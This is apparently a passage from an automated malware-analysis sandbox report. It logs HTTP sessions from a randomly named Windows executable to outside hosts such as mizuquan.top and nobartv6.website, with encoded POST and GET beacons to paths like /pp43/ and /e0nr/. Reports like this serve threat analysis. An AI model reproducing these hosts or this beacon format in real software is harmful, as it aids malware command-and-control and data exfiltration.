37 4f 78 4a 54 46 44 59 42 2f 38 34 32 38 69 4c 52 42 48 39 52 32 66 34 52 39 4d 6d 38 32 59 34 53 47 34 4c 31 43 33 55 64 75 51 52 57 34 50 2f 69 50 33 45 72 4c 70 4b 6e 76 47 6e 51 39 65 65 6c 4b 58 61 64 4e 30 6f 30 69 50 58 58 55 4f 39 6e 48 6e 6c 76 47 39 7a 43 54 64 79 2b 71 48 4e 56 53 32 6f 74 51 4e 39 51 7a 58 4a 4b 74 64 55 74 51 73 73 79 74 6a 43 52 61 51 6f 51 6a 56 48 55 30 2b 61 6c 74 4e 2f 4e 79 7a 62 46 36 41 32 33 57 30 4d 6e 46 74 71 66 4d 65 77 65 51 33 4d 31 74 46 6b 78 53 64 4f 66 65 74 71 35 33 65 63 5a 57 30 52 64 67 52 2b 39 72 41 41 62 39 41 6b 56 35 2b 69 45 53 50 45 57 4d 65 57 75 70 55 2f 4b 44 6e 66 39 35 34 47 4c 35 61 38 52 54 2f 41 61 43 55 2f 33 4d 46 69 77 76 35 46 71 7a 45 6e 6e 50 66 73 2b 62 6a 39 75 41 61 66 6a 74 43 35 2b 2f 48 54 47 33 6b 79 49 41 6c 51 42 76 65 [TRUNCATED] Data Ascii: A8_pSPdX=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w94k9kVeeRFPK1zuTu7OxJTFDYB/8428iLRBH9R2f4R9Mm82Y4SG4L1C3UduQRW4P/iP3ErLpKnvGnQ9eelKXadN0o0iPXXUO9nHnlvG9zCTdy+qHNVS2otQN9QzXJKtdUtQssytjCRaQoQjVHU0+altN/NyzbF6A23W0MnFtqfMeweQ3M1tFkxSdOfetq53ecZW0RdgR+9rAAb9AkV5+iESPEWMeWupU/KDnf954GL5a8RT/AaCU/3MFiwv5FqzEnnPfs+bj9uAafjtC5+/HTG3kyIAlQBvemH+0oB2EVC/abqKI8X6cxc8KHZ9BARW/qk7EQXLQQ4PNjEt6czLVu4QSH6Xl8L64R8UbN07XcBTm/9FiBbCh80GFteJUX3bt389ZUpHoPxgH3MynSEX7weS3l0yhkxcQeDo6cLaQC4FNwyw3n3nibpcOWE7LeurlqIrww8wRtt1VOhWnrtH4ATgbetoJ4PsElFmR/c8ss7CxtYLrpteWLAZDA3r0MdbYwtNWha+iihVCEFiTpG622TyUfsuds8PklPjAxlg6dd5tq8S+qKu1CXG8lJsdtVNWYpzQTIUiLTKft12sM77QSN4tr0YFOBl3tn457dWwjj9CtjyUVHAvSz6pyHTSOYkhofUmGv5ax/CLxBbOewwiv6k2L8iKg6Wro25pFfbeayymkHD1ed4hbZ6n1nQsozA66WEwswwrpttEGz9nxq+7bnqB4Pm0UuoTQ+P69Oi1YhYq/WvBi7EReSxNf6mAKUvkW34P1k3zTK11QEsYs7d5FM6wPMSBUVYetbCWygWLEqMj1eG2qwiDTeRW0zB0f9Fnv90xsaQb5oKUfZHK7TriNdq4aY0G8tCyTaaKkLX06Xzeswuwb1t7izk4bRDiSeURKLAN+jj5IaiRXLFYimRK7/7Ju+4IRDpZu7EFN27iVn+T1wibsPd+EqXsdsR+fpgKYd [TRUNCATED]
Sep 5, 2024 09:07:13.148035049 CEST	1765	OUT	Data Raw: 4e 42 6c 76 5a 50 2b 42 47 50 32 39 6a 78 74 32 5a 56 57 63 79 32 36 54 4f 4e 42 59 61 32 6d 4a 6b 32 30 35 6d 32 65 4a 74 57 43 57 2b 33 46 7a 4d 41 44 65 6f 62 61 58 6e 7a 77 50 59 61 56 44 51 74 2b 42 2b 6e 74 51 76 55 59 51 6b 6e 76 2b 54 31 Data Ascii: NBlvZP+BGP29jxt2ZVWcy26TONBYa2mJk205m2eJtWCW+3FzMADeobaXnzwPYaVDQt+B+ntQvUYQknv+T1SXK8GveP1TyBaxH1O+gk0gvz7VgK2RH6Q10j0xhnkQQNby8n8H23tDOtiIAgE2+WZycfbCbTBwTaQ9KQ+1/Cteye6pgJT/UrfFpFRfkvtyI3CxHuBdugz1Kl71uwJ/obcxLBGuAAxhkTTPgE5PKAfjd+dqxmrJg7I
Sep 5, 2024 09:07:14.286190987 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 05 Sep 2024 07:07:14 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.22	49191	43.242.202.169	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:15.683706999 CEST	557	OUT	GET /e0nr/?A8_pSPdX=K/5K1kUHGJjjXPw2ZAxDiVQm7x6tzLgI6mASorW7taRlmnE0Vh93enW5Z4Ds2cuqFJog14u/lpBfGIp9XbYiBV5aXYL70oFCx0heCDyMErSN1DDZ3qmDN0IxT5Av&38R0=jHY4nFvHAVc8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.mizuquan.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:07:16.542857885 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 05 Sep 2024 07:07:16 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.22	49192	103.224.182.242	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:27.807743073 CEST	2472	OUT	POST /pp43/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.nobartv6.website Origin: http://www.nobartv6.website Content-Type: application/x-www-form-urlencoded Content-Length: 2165 Connection: close Cache-Control: max-age=0 Referer: http://www.nobartv6.website/pp43/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6d 56 32 55 38 61 32 54 68 78 34 4f 57 59 6f 44 66 66 38 2b 68 4b 6c 69 71 75 59 54 68 7a 68 5a 44 74 65 33 5a 2b 54 38 6c 75 52 55 4a 43 35 54 43 58 68 62 50 78 6c 6f 72 6f 77 57 4e 41 36 6a 4a 35 47 74 4f 50 33 4c 70 72 65 7a 43 45 68 6b 4b 33 36 6a 63 45 4f 35 63 44 62 69 31 6c 50 6a 75 30 7a 6b 36 69 35 6b 64 67 6c 64 4f 31 4c 64 4a 4f 57 65 49 44 46 33 56 71 68 77 6f 50 32 6f 67 38 57 46 53 67 5a 4f 54 68 6e 2f 4c 41 79 37 5a 35 35 2b 72 7a 53 36 50 71 73 50 4b 32 4c 4f 43 7a 75 4f 74 56 44 4d 64 49 33 71 37 6f 64 6a 2f 6d 36 7a 49 51 70 59 43 4b 46 59 63 46 66 79 39 50 77 49 56 78 4c 36 34 4e 49 44 51 77 4e 31 78 57 52 6c 59 58 49 70 4b 2b 6e 6f 35 4b 4e 34 74 5a 75 35 5a 38 2b 4d 78 6c 4c 4a 66 69 33 59 53 46 54 4c 7a 32 35 54 78 61 64 39 7a 31 79 69 5a 6b 42 6c 4f 70 76 62 78 5a 52 59 4d 72 55 32 75 62 4f 77 69 37 55 75 38 45 39 63 64 5a 52 61 6e 66 4d 48 41 74 30 32 61 63 38 64 36 45 6a 50 30 65 6d 4b 78 51 31 69 73 35 6f 52 54 [TRUNCATED] Data Ascii: A8_pSPdX=ywbiYQ/q4W1CmV2U8a2Thx4OWYoDff8+hKliquYThzhZDte3Z+T8luRUJC5TCXhbPxlorowWNA6jJ5GtOP3LprezCEhkK36jcEO5cDbi1lPju0zk6i5kdgldO1LdJOWeIDF3VqhwoP2og8WFSgZOThn/LAy7Z55+rzS6PqsPK2LOCzuOtVDMdI3q7odj/m6zIQpYCKFYcFfy9PwIVxL64NIDQwN1xWRlYXIpK+no5KN4tZu5Z8+MxlLJfi3YSFTLz25Txad9z1yiZkBlOpvbxZRYMrU2ubOwi7Uu8E9cdZRanfMHAt02ac8d6EjP0emKxQ1is5oRTaetQZQfzRf7e5IgXm/bEYcoCA3Fs7k/9RPd7uf63RoyvzowGYzfA3lN+b/YmyWCynPt6uG4mC8ybbj3ohKInWW2CkSp31jFV58MkyFmLufLKKHvHsLuY+xVy2cDg6isvW8iaaV1afVAWZA6D0hJ/k4XnYZ1kM1gEwjugnxmlIkEzMFgmpeTCYJOagzeYe9z2pl1cJMPecFUs5YZ9L68VtviqN5+qk4KgFEXUtvpNeWhhzgxbj7EAJ73UxJ6d1Ost2xdGq7Lcgfj1Enpk/TXAeW3XepkZXvAG0/SZjl0n5tyPlMSD8W/MkfRbgAd3RGn0Uj94wL+dNLrlch2Lj8qbWKyCiWY0BTtktYGiRSL8yBSwDGbTKnpAWS6cuXZnSSrdRdfx/xtB6ydFADQuW6p0fePCSVyZ8ESm4UPfsy5B6ob0OLmHhNM54/MXbg/S1HDdMs0OhMKkS2GT6JxXymVmOuFn2D8u1HvV6C2mo/PPt4emEAkBEfUHAnKHmHSxstBjeqzVQAf14JZBjepy4W6UxofvNnTGj29UlG4kJRFrLHHzrnv8Husvm1IucD7HCeD0xPbt2RcOOBB3v7dmq3qsZvSVNuIxLnvy2vKci0BPoLXMp9m88aIsXW55iili8hiLf48bdCMxdENs5ZgXn1k09oyrJqoHWmR1nK [TRUNCATED]
Sep 5, 2024 09:07:27.812750101 CEST	313	OUT	Data Raw: 31 4c 42 41 6a 4f 54 31 74 67 30 34 6b 52 64 36 72 61 51 6f 6f 6b 30 2f 7a 73 4d 31 6c 62 55 6e 74 58 34 69 2b 79 66 41 31 56 2f 4a 53 6f 70 32 73 33 67 44 6c 52 6a 36 57 36 49 69 6a 59 65 35 42 65 48 69 39 31 4b 6b 6d 42 30 55 57 69 38 59 70 61 Data Ascii: 1LBAjOT1tg04kRd6raQook0/zsM1lbUntX4i+yfA1V/JSop2s3gDlRj6W6IijYe5BeHi91KkmB0UWi8YpawJj+KQAawj7z1tYKygk7sNQV2cBuY7dALVvYMzNpxdzB96wYoznd+P0iqr/5OZ2n6dreQg6isG+4Y/s285K+XaRpYiYuPdWkC1onf0DLT9RBdOgmJIrNhvcaB68G1wQ6OMIIZjMjH7ntmW58D5z/yDJ3FtRw3UoUf
Sep 5, 2024 09:07:28.391710043 CEST	876	IN	HTTP/1.1 200 OK date: Thu, 05 Sep 2024 07:07:28 GMT server: Apache set-cookie: __tad=1725520048.2164810; expires=Sun, 03-Sep-2034 07:07:28 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 581 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED] Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%C4iS]Z%sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.22	49193	103.224.182.242	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:30.347544909 CEST	2472	OUT	POST /pp43/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.nobartv6.website Origin: http://www.nobartv6.website Content-Type: application/x-www-form-urlencoded Content-Length: 3629 Connection: close Cache-Control: max-age=0 Referer: http://www.nobartv6.website/pp43/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 64 5a 44 75 57 33 5a 4f 54 38 6b 75 52 54 41 69 35 54 43 58 68 45 50 77 46 34 72 6f 4d 47 4e 47 2b 6a 4a 39 71 74 4f 4d 66 4c 75 72 65 7a 64 55 68 6d 4b 33 33 4b 63 45 53 74 63 44 6e 4d 31 6a 58 6a 67 69 76 6b 33 55 46 72 58 77 6c 66 66 46 4c 38 4a 4f 71 6a 49 44 4e 5a 56 6f 74 67 6f 4d 69 6f 68 4d 57 46 47 41 5a 4a 52 68 6e 2b 61 77 79 68 5a 35 6b 4f 72 7a 54 39 50 70 51 6c 4b 32 48 4f 43 67 57 4f 74 57 72 50 44 6f 33 70 2f 6f 64 6a 68 57 36 4c 49 51 70 63 43 4b 46 59 63 46 4c 79 38 66 77 49 56 77 4c 35 33 74 49 44 64 51 4e 79 73 47 73 63 59 58 4e 4b 4b 2b 58 53 34 37 46 34 73 63 36 35 49 63 2b 4d 34 31 4c 50 66 69 33 66 45 31 53 6f 7a 32 52 62 78 61 4e 74 7a 31 79 69 5a 68 4e 6c 43 62 48 62 32 4a 52 59 45 4c 55 33 6b 37 4f 78 69 37 51 63 38 45 5a 63 64 64 31 61 6c 74 55 48 4a 50 73 31 52 4d 38 41 34 30 6a 42 69 65 6d 44 78 51 42 63 73 35 68 47 54 [TRUNCATED] Data Ascii: A8_pSPdX=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThydZDuW3ZOT8kuRTAi5TCXhEPwF4roMGNG+jJ9qtOMfLurezdUhmK33KcEStcDnM1jXjgivk3UFrXwlffFL8JOqjIDNZVotgoMiohMWFGAZJRhn+awyhZ5kOrzT9PpQlK2HOCgWOtWrPDo3p/odjhW6LIQpcCKFYcFLy8fwIVwL53tIDdQNysGscYXNKK+XS47F4sc65Ic+M41LPfi3fE1Soz2RbxaNtz1yiZhNlCbHb2JRYELU3k7Oxi7Qc8EZcdd1altUHJPs1RM8A40jBiemDxQBcs5hGTZWtQcMf/Qf7epIvZG+TAYAsCGvns7oF9TLd6/f6wSAxjjoyN4zvE3l7+auLmy2Cy1jt7vm4sT89drj0shKl8GWiCkWx3xGYAYMMkCFmfsnIJaH3OML0XexDy2cXg/XbujQiabl1UpBAWZA9E0hL0Ek5nYdxkM5wEyrug2hmlNYE+MFg+ZeQMIImagXgYagM3Zh1csIPYetU4pYbyr6hIdvFqMJ+qkcagEcXXMvpM/Wh/Tg1Yj7bAJ7VUxN+d1fRtwhdGvPLakLjv0noi/TbEeWUXehOZWCnG1HSDDF0qtxyOFMMLcW/GEeEbgYn3U3c0Vb94B7+VNLo9sh1Jj8rKGKsCiGY0BftkpsGliKL7BpS/TGdcqmsJ2eacuGqnQ/udTZfwrltRZKeKQDWtm7mlPfaCSV2Z4ICmMYPe9S5DboYreLlJBNb0Y+7XbRoS0zTc9s0OiUKlkqGTqJxXymWmOuZn2fCuw7VV6C2n6HPPeQeokAhNkfPDAnuHmyzxoIJjeGzUEUf14JaeDem7YW9UxUovNm0Gjy9U0S4kcNFqovH0Lnv7HurkG1JucDrHDTe0wPb/3xcPLdA0f7Qkq2/l5zNVNqQxKTvyE7KOGgBIYLXFp9hksadxnqf5i/Ii9w6IuI8aqGMiusKqJZhK31m09sBrJigHXee1l6 [TRUNCATED]
Sep 5, 2024 09:07:30.359586000 CEST	1777	OUT	Data Raw: 71 44 52 41 5a 43 7a 31 36 39 45 34 4c 52 64 36 5a 61 52 6f 34 6b 31 44 7a 73 4f 4e 6c 61 31 6e 74 57 59 69 2f 39 2f 41 73 56 2f 4a 79 6f 70 75 6b 33 68 75 36 52 6c 32 57 35 71 71 6a 66 76 35 42 41 48 69 2f 31 4b 6b 53 46 30 5a 6d 69 38 5a 57 61 Data Ascii: qDRAZCz169E4LRd6ZaRo4k1DzsONla1ntWYi/9/AsV/Jyopuk3hu6Rl2W5qqjfv5BAHi/1KkSF0Zmi8ZWawVj+LgAazb7yFtbSSghyMNLH2dYuY7vAPFFYO/NpilzGM6wZYzhEuPjmqnt5Ol6n7sQeio6geu+8rbsnM5x33acpYuwuPtwkDk9nu4DNz9RFYSj3ZJgaRvBaB6YG0kU6PghIcPMjFTntWW2rj554yCO3Fxow015Uf
Sep 5, 2024 09:07:31.022140026 CEST	876	IN	HTTP/1.1 200 OK date: Thu, 05 Sep 2024 07:07:30 GMT server: Apache set-cookie: __tad=1725520050.4286201; expires=Sun, 03-Sep-2034 07:07:30 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 581 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED] Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%C4iS]Z%sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.22	49194	103.224.182.242	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:32.885814905 CEST	561	OUT	GET /pp43/?38R0=jHY4nFvHAVc8&A8_pSPdX=/yzCblrJsERuqgz3jNPVh3QXFKomWtIu+6Zh8/8YqB01FuO+DLXf0tlFHyR0DQ5uHVkhjJ85CmXcOpGqCMWGlbfbEQkZLHfLKViDcC/h13rX0D3njlQFWG5ZKSyE HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.nobartv6.website Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:07:33.552184105 CEST	1236	IN	HTTP/1.1 200 OK date: Thu, 05 Sep 2024 07:07:33 GMT server: Apache set-cookie: __tad=1725520053.6737872; expires=Sun, 03-Sep-2034 07:07:33 GMT; Max-Age=315360000 vary: Accept-Encoding content-length: 1532 content-type: text/html; charset=UTF-8 connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 2f 70 70 34 33 2f 3f 33 38 52 30 3d 6a 48 59 34 6e 46 76 48 41 56 63 38 26 41 38 5f 70 53 50 64 58 3d 2f 79 7a 43 62 6c 72 4a 73 45 52 75 71 67 7a 33 6a 4e 50 56 68 33 51 58 46 4b 6f 6d 57 74 49 75 2b 36 5a 68 38 2f 38 59 71 42 30 31 46 75 4f 2b 44 4c 58 66 30 74 6c 46 48 79 52 30 44 51 35 75 48 56 6b 68 6a 4a 38 35 43 6d 58 63 4f 70 47 71 43 4d 57 47 6c 62 66 62 45 51 6b 5a 4c 48 66 4c 4b 56 69 44 63 43 2f [TRUNCATED] Data Ascii: <html><head><title>nobartv6.website</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.nobartv6.website/pp43/?38R0=jHY4nFvHAVc8&A8_pSPdX=/yzCblrJsERuqgz3jNPVh3QXFKomWtIu+6Zh8/8YqB01FuO+DLXf0tlFHyR0DQ5uHVkhjJ85CmXcOpGqCMWGlbfbEQkZLHfLKViDcC/h13rX0D3njlQFWG5ZKSyE&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body
